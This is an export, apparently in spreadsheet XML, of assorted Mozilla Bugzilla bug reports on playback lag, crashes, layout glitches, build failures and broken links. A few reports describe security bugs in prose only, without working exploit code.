    <t>Created attachment 802615
Log of song lag
Description:
Attempting to play a song in the Music app causes a long delay before the song begins.  The device seems unresponsive before the song starts playing but all inputs performed during the delay go off at once when the song starts playing.
Repro Steps:
1) Update Buri to Build ID: 20130910040201
2) Launch the Music app.
3) Select a song to play how doesn't matter.
4) Observe the screen as the song loads.
Actual:
There is a delay of over 20 seconds before the song begins to play.
Expected:
The song being playing immediately.
Environmental Variables
Occurs on Buri 1.2 mozilla RIL
Build ID: 20130910040201
Gecko: http://hg.mozilla.org/mozilla-central/rev/be1053dc223b
Gaia: 6deda9d7c51f278443f704217eaed722044a03e7
Platform Version: 26.0a1
Notes:
Repro frequency: 85%
Test Suite Name: Music
UCID: music-008
Link to failed test case: https://moztrap.mozilla.org/manage/cases/?filter-id=3753
See attached logcat logs</t>
  </si>
  <si>
    <t>sotaro.ikeda.g</t>
  </si>
  <si>
    <t>ckreinbring</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-348074</t>
  </si>
  <si>
    <t>no Linux and Windows builds (nightly &amp; tinderbox) for Seamonkey Branches 1.8 1.8.0</t>
  </si>
  <si>
    <t>Last builds are from Aug 4th:
http://ftp.mozilla.org/pub/mozilla.org/seamonkey/nightly/2006-08-04-00-mozilla1.8/
http://ftp.mozilla.org/pub/mozilla.org/seamonkey/nightly/latest-mozilla1.8/
http://ftp.mozilla.org/pub/mozilla.org/seamonkey/nightly/latest-mozilla1.8.0/
How am I supposed to find bugs on branch if I can't test? Testing trunk isn't an option as I'm still on Win98.
current:
http://tinderbox.mozilla.org/showbuilds.cgi?tree=Mozilla1.8-SeaMonkey
last working:
http://tinderbox.mozilla.org/showbuilds.cgi?tree=Mozilla1.8-SeaMonkey&amp;hours=24&amp;maxdate=1154758064&amp;legend=0
Building stopped on this page in the yellow box the binary produced by the green box below the yellow one can still be downloaded from the tinderbox link above so the results of tinderboxes don't get transferred to the download directory.
Three boxes below the letter 'D' is the link to the nightly and this letter is missing on the days above.
As this is an ALL Windows related bug I'm setting the Product to WindowsXP  just to not get ignored because I'm still on Win98 -)
It is important as I don't want to see a Seamonkey 1.0.6 following Seamonkey 1.0.5 in less than a fortnight.</t>
  </si>
  <si>
    <t>SOCORRO-525785</t>
  </si>
  <si>
    <t>Integrate correlation reports into Socorro UI</t>
  </si>
  <si>
    <t>David did some fine work here:
http://dbaron.org/mozilla/topcrash-modules
We need to find a way to automate these then integrate them into the existing reporter UI.  This is a meta bug as many lesser bugs will be spawned to track the effort.
Marking this for 1.3 but dependent bugs will fall into earlier milestones.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-314832</t>
  </si>
  <si>
    <t>Broken link in Firefox 1.5 RC 1 Released announcement</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b5) Gecko/20051006 Firefox/1.4.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b5) Gecko/20051006 Firefox/1.4.1
release notes links to 404:
http://www.mozilla.org/products/firefox/releases/1.5bhtml
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>fishos</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-191631</t>
  </si>
  <si>
    <t>mail: moving/copying/deleting large amounts of mail extremely slow and mozilla freezes temporarily</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2.1) Gecko/20021130
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2.1) Gecko/20021130
I am using Mozilla Mail as my mail client at the moment and I'm on a few busy
mailing lists.  As a result every month I move a couple of thousand [minimal
size ~1KB] emails to archive folders.
Moving ~2700 * ~1KB emails from one local mail folder to another local mail
folder took at least one minute [probably two] perfmon showing disk throughput
at 30KB/sec read and 60KB/sec write mozilla browser and mail during this time
froze for about half that time.  CPU usage was minimal but explorer also
partially stopped responding [start menu would work desktop and explorer
windows froze].
My machine spec:
AthlonXP 1800+ 1.5GHz
256MB RAM
10GB UDMA66 IDE disk (system boot disk)
60GB UDMA100 IDE disk (apps/data disk including mozilla mail app and data)
Windows 2000 SP2 with the latest patches latest reliable drivers as well
The same task in Eudora takes less than 15 seconds stops Eudora from responding
during that time but doesn't affect anything else.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>mc_legolas</t>
  </si>
  <si>
    <t>CORE-431833</t>
  </si>
  <si>
    <t>DOMFrameContentLoaded event isn't fired anymore</t>
  </si>
  <si>
    <t>User-Agent:       Opera/9.24 (Windows NT 5.1 U ru)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 ru rv:1.9b5) Gecko/2008032620 Firefox/3.0b5
In firefox2 event DOMFrameContentLoaded fired when frame content dom loaded in all firefox3 betas not.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>pointervoid</t>
  </si>
  <si>
    <t>TOOLKIT-354065</t>
  </si>
  <si>
    <t>Colorpicker button should evaluate 'color' attribute on construction</t>
  </si>
  <si>
    <t>When you create a colorpicker button dynamically and set the 'color' attribute it gets ignored. Only setting the color property after appending the colorpicker button to the document works.
Current behaviour:
Setting attribute before appending: doesn't work
Setting attribute after appending: doesn't work
Setting property before appending: doesn't work
Setting property after appending: works
Expected behaviour:
All four methods should work. (See also attached testcase.)
The same problem exists for XPFE's colorpicker.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-948786</t>
  </si>
  <si>
    <t>please bring back items from phx1</t>
  </si>
  <si>
    <t>4x c14-c19 power cables
pics of overhead fiber front and back in the modules for comparison with scl3</t>
  </si>
  <si>
    <t>vhua</t>
  </si>
  <si>
    <t>vle</t>
  </si>
  <si>
    <t>CORE-619021</t>
  </si>
  <si>
    <t>crash when opening a page with several marquee elements [@ nsStyleSet::GetContext ]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 Linux i686 on x86_64 rv:2.0b7) Gecko/20100101 Firefox/4.0b7
Build Identifier: Firefox 4.0b7
Opening a specific HTML document consisting mainly of marquee elements causes current Firefox 4.0b7 to crash with an invalid read of size 4 with a high address (0xf0dea813) in libxul.so.
Reproducible: Always
Steps to Reproduce:
1.$ echo       
 &gt; marquee.html
2. 
3. firefox marquee.html
Actual Results:  
Firefox crashes with a segfault.
Expected Results:  
Firefox remains running.
This looks like a potentially dangerous crash to me. 4.0 stable release is probably not too far off and many people are already using 4.0 beta series so reporting this as a security issue to be on the safe side.</t>
  </si>
  <si>
    <t>aki.helin</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-322577</t>
  </si>
  <si>
    <t>[404] link to http://www.mozilla.org/docs/refList/refNSPR</t>
  </si>
  <si>
    <t>The link from http://www.mozilla.org/projects/nspr/release-notes/nspr31.html to NSPR docs leads to unexisting page.</t>
  </si>
  <si>
    <t>stas-bugzilla</t>
  </si>
  <si>
    <t>CORE-462798</t>
  </si>
  <si>
    <t>don't pass cairo_font_options_t* between system and moz cairo (wrong hint style)</t>
  </si>
  <si>
    <t>In gfxPangoFonts.cpp:
    const cairo_font_options_t *options =
        gdk_screen_get_font_options(gdk_screen_get_default())
    cairo_ft_font_options_substitute(options aPattern)
This would be a problem for example if moz cairo added support for lcd_filter options but system cairo did not have such support.
I think the best thing to do here would be to ensure that
cairo_ft_font_options_substitute is the function from system cairo.
aPattern is an FcPattern* which can then be safely passed between cairos.</t>
  </si>
  <si>
    <t>CORE-646495</t>
  </si>
  <si>
    <t>TI+JM: Assertion failure: !fe-&gt;type.isConstant() at ../methodjit/FrameState-inl.h:484</t>
  </si>
  <si>
    <t>--
function f() {
    var x = 1
    var y
    if (x = y = Math) {}
}
f()
--
$ ./js -a -n -m test.js
Assertion failure: !fe-&gt;type.isConstant() at ../methodjit/FrameState-inl.h:484</t>
  </si>
  <si>
    <t>CORE-508487</t>
  </si>
  <si>
    <t>elementFromPoint returns null outside of viewport although aIgnoreRootScrollFrame is true</t>
  </si>
  <si>
    <t>Created attachment 392659
fix the early return condition
nsIDOMWindowUtils::elementFromPoint takes the boolean parameter aIgnoreRootScrollFrame to allow for fetching elements via points that fall outside of the viewport but nsDocument::ElementFromPointHelper returns early for negative-valued coordinates regardless of the value of this parameter which causes elementFromPoint to return null for all points to the top or left of the viewport.
I've attached the one-line fix.</t>
  </si>
  <si>
    <t>roy.frostig</t>
  </si>
  <si>
    <t>CORE-331665</t>
  </si>
  <si>
    <t>Chrome Registry generates complete screwed up chrome.manifest files</t>
  </si>
  <si>
    <t>This is an odd bug and I don't actually know what component to blame - it could be NSPR it could be XPCOM I'm really not sure. Feel free to move it.
This bug occurs on Mozilla/5.0 (Windows U Windows NT 5.2 en-US rv:1.9a1) Gecko/20060325 Firefox/1.6a1 ID:2006032500 (trunk as of 5h40m ago).
When an extension has contents.rdf files but no chrome.manifest chromereg makes one for it. It does this in parts writing out the conversion of each contents.rdf file separately appending to the manifest file each time. Only there's a bit of a problem with that... the file pointer is at the *start* of the file each time it re-opens it for appending.
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/chrome/src/nsChromeRegistry.cpp&amp;rev=1.346&amp;mark=1559-1560#1549
I've verified that aAppend is true (value 1) but cannot easily verify the location of the file pointer except by observing the resulting changes in the file after each PR_Write.
The result is that each segment is written ontop of the other giving a completely messed up and broken manifest. Given the lack of code changes to the chromereg code in this area I'm going to guess it is an NSPR or XPCOM bug. The Unicode XPCOM I/O bug springs to mind but I've got no evidence either way.
I've set this to major because it looks like a low-level file handling issue which could potentially affect a lot of things and it completely breaks installing extensions in Firefox that have no chrome.manifest (which was exactly the thing I was testing).</t>
  </si>
  <si>
    <t>CORE-152345</t>
  </si>
  <si>
    <t>space left between adjacent tables</t>
  </si>
  <si>
    <t xml:space="preserve">The following HTML viewed in Netscape 6.X IE and Opera displays a thin white
line that is not present in other browsers.
&lt;!--
 .TabTable{
 }
 A.TabSelected.TabSelected.BottomSpacer.SpacerLast.MenuBar{
	background-color: #c0c0c0
}
 #Tab.Tab{
	font-family : Verdana Geneva Arial Helvetica sans-serif
	font-size : 10pt
	font-weight : bold
	text-decoration : none
	background-color : #9C9A9C
	color: Black
	text-align : center
	white-space : nowrap
}
 #Tab:hover{
 	text-decoration : underline
 }
 #TabSelected.TabSelected {
 	font-family : Verdana Geneva Arial Helvetica sans-serif
 	font-size : 10pt
 	font-weight : bold
 	text-decoration : none
 	color: #0000FF
 	text-align : center
	white-space : nowrap
 }
 .TabSelectedColor{ background-color: #C0C0C0 }
 .TabSelectedHL{ background-color: #D8D0C8 }
 .TabSelectedLL{ background-color: Black   }
 .TabHL{ background-color: #D8D0C8 }
 .TabLL{ background-color: Black   }
 .Spacer {
 	height:15pt
 	font-size:15pt
 }
 .TopSpacer {
 	height:1pt
 	font-size:1pt
 }
 .BottomSpacer {
 	height:1pt
 	font-size:1pt
 }
 .SpacerLast {
 	height:3pt
 	font-size: 3pt
 }
 .RightArea{
 	font-family : Verdana Geneva Arial Helvetica sans-serif
 	font-size : 10pt
 	font-weight : normal
 	text-decoration : none
 	text-align : right
 }
 .MenuBar{
 	font-family : Verdana Geneva Arial Helvetica sans-serif
 	font-size : 10pt
 	font-weight : bold
        background-color: #C0C0C0
 	color: black
 }
 .MenuBarItem{
	font-family : Verdana Geneva Arial Helvetica sans-serif
	font-size : 10pt
	font-weight : bold
	text-decoration : none
	color: Black
	text-align : center
	white-space : nowrap
 }
 .MenuBarItemSelected {
 	font-family : Verdana Geneva Arial Helvetica sans-serif
 	font-size : 10pt
 	font-weight : bold
 	text-decoration : none
 	color: #0000FF
 	text-align : center
	white-space : nowrap
 }
 .MenuBarItem:hover{
 	text-decoration : underline
 }
 BODY{
        background-repeat : repeat-x
        padding-top : 0px
        padding-left : 0px
        padding-right : 0px
        padding-bottom : 0px
        margin-top : 0px
        margin-left : 0px
        margin-right : 0px
        margin-bottom : 0px
        border-width : 0px 0px 0px 0px
        border-style : none none none none
  }
--&gt;
Does not work in Netscape 7.0
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
       &lt;td colspan=3 class=TabSelectedHL valign=top width=1
height=1&gt;
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
       &lt;img
src=blank.gif border=0 alt= height=1 width=1 /&gt;
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
       &lt;img
src=blank.gif border=0 alt= height=1 width=1 /&gt;
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
       &lt;img
src=blank.gif border=0 alt= height=1 width=1 /&gt;
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
       &lt;img
src=blank.gif border=0 alt= height=1 width=1 /&gt;
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
       &lt;img
src=blank.gif border=0 alt= height=1 width=1 /&gt;
                 &lt;span
title=Manage University&gt;University
       &lt;img
src=blank.gif border=0 alt= height=1 width=1 /&gt;
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
                 &lt;a
href=index.jsp?tab=college target=_parent title=Manage Collges class=Tab
&gt;College
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
                 &lt;a
href=index.jsp?tab=report target=_parent title=View Reports class=Tab
&gt;Reports
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
                 &lt;a
href=index.jsp?tab=user target=_parent title=My user accout information
class=Tab &gt;MyProfile
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
                 &lt;a
href=index.jsp?tab=help target=_parent title=Help class=Tab
&gt;Help
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
       &lt;img
src=blank.gif border=0 alt= height=1 width=1 /&gt;
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
       &lt;img
src=blank.gif border=0 alt= height=1 width=1 /&gt;
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
       &lt;img
src=blank.gif border=0 alt= height=1 width=1 /&gt;
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
       &lt;img
src=blank.gif border=0 alt= height=1 width=1 /&gt;
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
       &lt;img
src=blank.gif border=0 alt= height=1 width=1 /&gt;
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
       &lt;img src=blank.gif
border=0 alt= height=1 width=1 /&gt;
      &lt;a class=MenuBarItem title=University Summary
href=index.jsp?tab=site|
      &lt;a class=MenuBarItem title=University Colleges
href=index.jsp?tab=site|
      &lt;a class=MenuBarItem title=University Departments
href=index.jsp?tab=site|
      &lt;a class=MenuBarItemSelected title=University Students
href=index.jsp?tab=site|
      &lt;a class=MenuBarItem title=University Courses
href=index.jsp?tab=site
    &lt;span
style=font-size:9font-family : Verdana Geneva Arial Helvetica sans-serif
&gt;Welcomesnick&lt;a href=PLSystem.controller?cmd=CmdLogout title=System
log out &gt;LOG OUT
  &lt;td class=TopSpacer colspan=3
&gt;
This page produces a thin white (background color) line under the tabs using
Netscape 7 PR. 
This line was not there in Netscape 6.2 It is not there on Opera 6.02 or MS
Explorer.
Could it be a bug?
</t>
  </si>
  <si>
    <t>arudmik</t>
  </si>
  <si>
    <t>CORE-401775</t>
  </si>
  <si>
    <t>Inline SVG in table doesn't expand cell width</t>
  </si>
  <si>
    <t>User-Agent:       Opera/9.24 (X11 Linux i686 U en)
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a9pre) Gecko/2007102904 Minefield/3.0a9pre
When a table cell contains an inline  the cell's height stretches to fit the SVG but its width does not.
Reproducible: Always
Steps to Reproduce:
0. See attached example.
Actual Results:  
Both table columns are the same width. The second table row is much taller than the first row. The graph in the bottom-right cell fits within the cell's top/bottom borders but overlaps the right border.
Expected Results:  
The second column should be wide enough to contain the SVG.
This works like I expected in Firefox 2 and in Opera 9.5.</t>
  </si>
  <si>
    <t>TOOLKIT-215467</t>
  </si>
  <si>
    <t>Download System Upgrade Phase 2</t>
  </si>
  <si>
    <t>This bug is to track Download System Upgrade Phase 2 - which covers the download
manager and progress windows.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-425406</t>
  </si>
  <si>
    <t>Grant access to surveys.mozilla-europe.org/results/ for pascalc and sethb</t>
  </si>
  <si>
    <t>In bug 407461 I asked about setting up a protected area at https://surveys.mozilla-europe.org/results/. This works perfectly and I would now like to ask to grant access to this site to:
- pascal.chevrel@mozilla-europe.org
- sbindernagel@mozilla.com
Thank you!</t>
  </si>
  <si>
    <t>THUNDERBIRD-317404</t>
  </si>
  <si>
    <t>Importing an empty ldif address confuses thunderbird</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 de-DE rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Build Identifier: Thunderbird 1.5 (20051025)
When one tries to import an empty ldif file as address book into thunderbird
they usual import procedure is not carried through to the end the user can cancel out but there is no explanation what happened.
Reproducible: Always
Steps to Reproduce:
Steps to reproduce the problem:
1. create an empty ldif file
2. import it (tools/import):
   a) select Address Books
   b) select Text File (LDIF .tab .csv .txt)
   [file chooser pops up]
   c) select the file created in step 1 Open
At this point the active (modal) dialog for the address book is the dialog from step 2b Back and Next are greyed out and only Cancel is possible.
thunderbird is not using any CPU (according to task manager) and nothing happens.
Actual Results:  
Unexpected window appears with unusual button possibilities.
Expected Results:  
Either finish the import (importing nothing) or complain that the file is empty.</t>
  </si>
  <si>
    <t>wiz</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-453087</t>
  </si>
  <si>
    <t>hgweb for http://hg.mozilla.org/users/asrail_gmail.com/tooling is broken</t>
  </si>
  <si>
    <t>The web view for the http://hg.mozilla.org/users/asrail_gmail.com/tooling repository is broken.
Due that viewing http://hg.mozilla.org/users/asrail_gmail.com raises an error.
I took a look on a lot of other user repositories and all of them were OK.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-407871</t>
  </si>
  <si>
    <t>Need CVS commit message modified to give info about the right bug</t>
  </si>
  <si>
    <t>I accidentally used the wrong commit message completely for bug 407044. Please change the commit message to the following:
Bug 407044 - Download manager should use more Linux stock icons [p=ventnor.bugzilla@yahoo.com.au (Michael Ventnor) r=gavin a1.9=schrep]</t>
  </si>
  <si>
    <t>FIREFOX-523578</t>
  </si>
  <si>
    <t>test_places/queries/test_redirectsMode.js fails and then reports a failure in head_queries.js</t>
  </si>
  <si>
    <t>http://tinderbox.mozilla.org/showlog.cgi?log=Firefox-Unittest/1256131500.1256133470.2230.gz
OS X 10.5.2 mozilla-central test opt everythingelse on 2009/10/21 06:25:00  
TEST-UNEXPECTED-FAIL | /builds/slave/mozilla-central-macosx-opt-unittest-everythingelse/build/xpcshell/tests/test_places/queries/test_redirectsMode.js | test failed (with xpcshell return code: 0) see following log:
...
TEST-UNEXPECTED-FAIL | /builds/slave/mozilla-central-macosx-opt-unittest-everythingelse/build/xpcshell/tests/test_places/queries/head_queries.js | 1256133025493997 == 0 - See following stack:
JS frame :: /builds/slave/mozilla-central-macosx-opt-unittest-everythingelse/build/xpcshell/head.js :: do_throw :: line 197
JS frame :: /builds/slave/mozilla-central-macosx-opt-unittest-everythingelse/build/xpcshell/head.js :: do_check_eq :: line 227
JS frame :: /builds/slave/mozilla-central-macosx-opt-unittest-everythingelse/build/xpcshell/tests/test_places/queries/head_queries.js :: compareArrayToResult :: line 409
JS frame :: /builds/slave/mozilla-central-macosx-opt-unittest-everythingelse/build/xpcshell/tests/test_places/queries/test_redirectsMode.js :: check_results_callback :: line 123
JS frame :: /builds/slave/mozilla-central-macosx-opt-unittest-everythingelse/build/xpcshell/tests/test_places/queries/test_redirectsMode.js :: cartProd :: line 177
JS frame :: /builds/slave/mozilla-central-macosx-opt-unittest-everythingelse/bui
ld/xpcshell/tests/test_places/queries/test_redirectsMode.js :: run_test :: line 
299
JS frame :: /builds/slave/mozilla-central-macosx-opt-unittest-everythingelse/bui
ld/xpcshell/head.js :: _execute_test :: line 125
JS frame :: -e ::  :: line 1
TEST-INFO | (xpcshell/head.js) | exiting test</t>
  </si>
  <si>
    <t>MOZILLA_LABS_GRAVEYARD-477737</t>
  </si>
  <si>
    <t>bypassing authorized host list change persona from a malicious site</t>
  </si>
  <si>
    <t>Personas allows the getpersonas.com site to change the current persona while the user is previewing the gallery. It does this by listening for special events and vetting the source against the authorized host list.
The whitelisting intends to allow subdomains of the whitelisted host but does not check that a separating dot exists that would ensure the originating host is a subdomain rather than merely a superstring of the authorized hostname. That is evilpersonas.com and fakepersonas.com etc. can change your persona. It would be easy for some joker to register such a domain and then host persona-changing invisible iframes on various (hacked?) sites.
The solution appears to be to check that the event source is an exact match for an authorized domain or substring matches the authorized domain plus a leading dot. You may want to consider requiring the authorized host list to be explicit about allowed subdomains through a wildcard syntax or maybe an optional leading dot as with cookie domains.
It's more annoying than an exploit from a quick glance it appears you can only select from personas that exist in the official gallery. It looks like the nodes can specify the text color though so you could make a user's browser hard to use. Filing as security-sensitive for now but that may be unnecessary.</t>
  </si>
  <si>
    <t>CORE-528368</t>
  </si>
  <si>
    <t>crash during spell check [@ nsTextServicesDocument::IsBlockNode(nsIContent*)]</t>
  </si>
  <si>
    <t>crash during spell check?  [@ nsTextServicesDocument::IsBlockNode(nsIContent*)]
Crash Address	0x8 in most cases
rarely seen in FF (avg 2 per month) bp-ceff975e-8aac-4bdc-af7f-524422091020
bp-a5286843-5a4a-4c5c-a8ac-f92022090508
Ran spell checker and when I chose to replace a word the carsh occurred.
0	thunderbird.exe	nsTextServicesDocument::IsBlockNode	 editor/txtsvc/src/nsTextServicesDocument.cpp:3095
1	thunderbird.exe	nsTextServicesDocument::FirstTextNodeInNextBlock	editor/txtsvc/src/nsTextServicesDocument.cpp:4263
2	thunderbird.exe	nsTextServicesDocument::GetFirstTextNodeInNextBlock	editor/txtsvc/src/nsTextServicesDocument.cpp:4325
3	thunderbird.exe	nsTextServicesDocument::FirstBlock	editor/txtsvc/src/nsTextServicesDocument.cpp:615
4	thunderbird.exe	mozSpellChecker::Replace	extensions/spellcheck/src/mozSpellChecker.cpp:223
5	thunderbird.exe	nsEditorSpellCheck::ReplaceWord	editor/composer/src/nsEditorSpellCheck.cpp:308
6	xpcom_core.dll	NS_InvokeByIndex_P	xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp:101
7	thunderbird.exe	XPCWrappedNative::CallMethod	js/src/xpconnect/src/xpcwrappednative.cpp:2291
8	thunderbird.exe	XPC_WN_CallMethod	js/src/xpconnect/src/xpcwrappednativejsops.cpp:1583 
bp-dc47f80f-aa41-4b8c-98ce-5d2b42091016</t>
  </si>
  <si>
    <t>CORE-504561</t>
  </si>
  <si>
    <t>Comboboxes do not emit accessibility events when selection changes</t>
  </si>
  <si>
    <t>Mozilla/5.0 (X11 U SunOS i86pc en-US rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3
1) Go to http://mail.google.com/mail/signup
2) Tab to the Security Question: combobox
3) Run accerciser - monitor all the events from the above combobox
4) Back in Firefox press the up/down arrows to change the combobox selection
No events are issued when the combobox selection changes.
Note that this may be an intermittent problem.  I was able to manage to do something (some odd combination of changing windows selecting different tabs in FF etc.) to get it to emit events but I don't know what it was.
On a related note there doesn't appear to be any way to expand the combobox from the keyboard.</t>
  </si>
  <si>
    <t>TOOLKIT-321057</t>
  </si>
  <si>
    <t>crash [@ NS_NewToolkitProfileService] because it doesn't handle OOM</t>
  </si>
  <si>
    <t>in addition to this class being unreachable from the outside world it's crash happy.</t>
  </si>
  <si>
    <t>CORE-422484</t>
  </si>
  <si>
    <t>Add parens around macro if conditions</t>
  </si>
  <si>
    <t>Created attachment 308926
Patch to add parens to macro if conditions
There are 2 places in SVG where if conditions are missing parens like
  if NS_FAILED(rv) { ...
This compiles fine because of the definition of the macro but it looks funny. More importantly it prevents NS_FAILED from being an inline function which makes static analysis harder. 
So can we add them as in the attached patch? mozilla-central is where I really want this that's the main target for static analysis but it might be good to have it in CVS trunk as well.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-419905</t>
  </si>
  <si>
    <t>turn off pgo in places mozstorage sqlite</t>
  </si>
  <si>
    <t>Seems to cause problems.</t>
  </si>
  <si>
    <t>NSS-177387</t>
  </si>
  <si>
    <t>Implement software integrity check of the softoken using DSA</t>
  </si>
  <si>
    <t>We need to implement a software integrity check of
the softoken using DSA.
Here is my proposal.
1. Write a tool that generates a DSA key pair and
generates a signature.
2. During the build we invoke the tool on the
softoken after it is built.  Store the public key
and the signature in a file.  Discard the private
key.
3. Distribute the public key/signature file with
the softoken.  The public key/signature file must
be installed in the same directory as the softoken.
4. The software integrity check of the softoken
uses platform-dependent techniques to discover its
installation directory.  It then reads itself (as
a file) and the public key/signature file to verify
the signature.</t>
  </si>
  <si>
    <t>CORE-221189</t>
  </si>
  <si>
    <t>[FIX]nsUnknownDecoder can read uninitialized data</t>
  </si>
  <si>
    <t>If the check for HTML is done near the end of the string such that
sizeof(_tagstr) chars will run us off the end of mBuffer then we can in fact
read off the edge of the buffer (since the buffer is _not_ null-terminated).
Patch coming up.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-386724</t>
  </si>
  <si>
    <t>Change Beta text</t>
  </si>
  <si>
    <t>Hi
Please change the following text.
Currently it says: 
Beta Versions
Mozilla offers download links to beta versions of Firefox in the following languages. Please note that these beta versions are not final releases.
 ===
proposed edit:
Beta Versions
Mozilla offers download links to the following beta language versions of Firefox. Please note that these beta versions are not final releases.</t>
  </si>
  <si>
    <t>BUGZILLA-65311</t>
  </si>
  <si>
    <t>If no products available whine a bit.</t>
  </si>
  <si>
    <t>Split off from bug #58891.
If there are no bugzilla products available (because of usebuggroupsentry) we
should not do this:
Enter Bug
First you must pick a product on which to enter a bug.
We should do this:
Sorry there are no products that you are authorised to enter bugs for.
At the very least.  I'm not sure if we should point the admin to the settings
that might need to be changed.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-152129</t>
  </si>
  <si>
    <t>Make autoRegister mode register chrome</t>
  </si>
  <si>
    <t>I should have realized this before.  regchrome suffers the same problem as
regxpcom in a static build namely that getting any service fails because the
static components aren't linked into the binary.
Navigator -autoRegister YES  should register chrome as well by calling
nsIChromeRegistry::CheckForNewChome().  That will allow chrome registration to
happen during packaging so that it doesn't need to happen during first run.</t>
  </si>
  <si>
    <t>CORE-378987</t>
  </si>
  <si>
    <t>Don't try to collect documents windows and elements of actively viewed documents</t>
  </si>
  <si>
    <t>Created attachment 262990
Patch to fix
Patch coming up that makes us not traverse out of actively viewed elements documents and windows.
I still haven't tested the performance winnings by this. I'll do that before requesting review</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-224999</t>
  </si>
  <si>
    <t>Build error with disable-installer</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6a) Gecko/20031106 Firebird/0.7+ (Gcc 3.3.1 i686 optimized - MozJF)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6a) Gecko/20031106 Firebird/0.7+ (Gcc 3.3.1 i686 optimized - MozJF)
All is in the title.
Current CVS trunk build.
But the weird point : I set --disable-installer option on :(
Using MingW32 gcc under windows.
Reproducible: Always
Steps to Reproduce:
1.keep your sources up to date
2.make -f client.mk build with mingw32
3.wait
Actual Results:  
build process is broken while making installer ?!
Expected Results:  
Making build process going to its normal end.
Weird point : I did not want to use installer.
Here is my mozconfig :
CC=gcc
CXX=g++
CPP=cpp
AS=as
LD=ld
LDFLAGS=-mwindows
export MOZ_PHOENIX=1
mk_add_options MOZ_PHOENIX=1
ac_add_options --disable-ldap
ac_add_options --disable-mailnews
ac_add_options
--enable-extensions=cookiexml-rpcxmlextrasp3ppreftransformiixuniversalchardettypeaheadfindwebservices
ac_add_options --enable-crypto
ac_add_options --disable-composer
ac_add_options --disable-profilesharing
ac_add_options --disable-installer
mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/../fbbuild
ac_add_options --disable-accessibility
ac_add_options --disable-debug
ac_add_options --disable-tests
ac_add_options --enable-strip
ac_add_options --enable-strip-libs
ac_add_options --enable-optimize=-Os -march=i686
ac_add_options --enable-reorder
ac_add_options --disable-pedantic</t>
  </si>
  <si>
    <t>MOZILLA.ORG-353770</t>
  </si>
  <si>
    <t>patch author should be sylvain.pasche@gmail.com</t>
  </si>
  <si>
    <t>per bug 345982 comment 9 i botched the checkin comment what do i need to do to have it fixed?</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-123469</t>
  </si>
  <si>
    <t>sisweb.ucdavis.edu - cannot logon</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:0.9.8) Gecko/20020204
BuildID:    2002020415
I've never been able to successfully logon to the UCDavis Sisweb using any
Mozilla build.  After entering student ID and password into form (after logon)
the same page continuously reloads.
E-mailed sisweb@ucdavis.edu on 1/30/02 reporting problem and asking for
assistance seeing as its in a student-restricted site no one but registered
students see the bug.
Reproducible: Always
Steps to Reproduce:
1. go to sisweb.ucdavis.edu
2. click on LOGIN to ....
3. successfully login
4. enter student ID and password
Actual Results:  The page requesting student id / password reloads
Expected Results:  Successful login into Sisweb
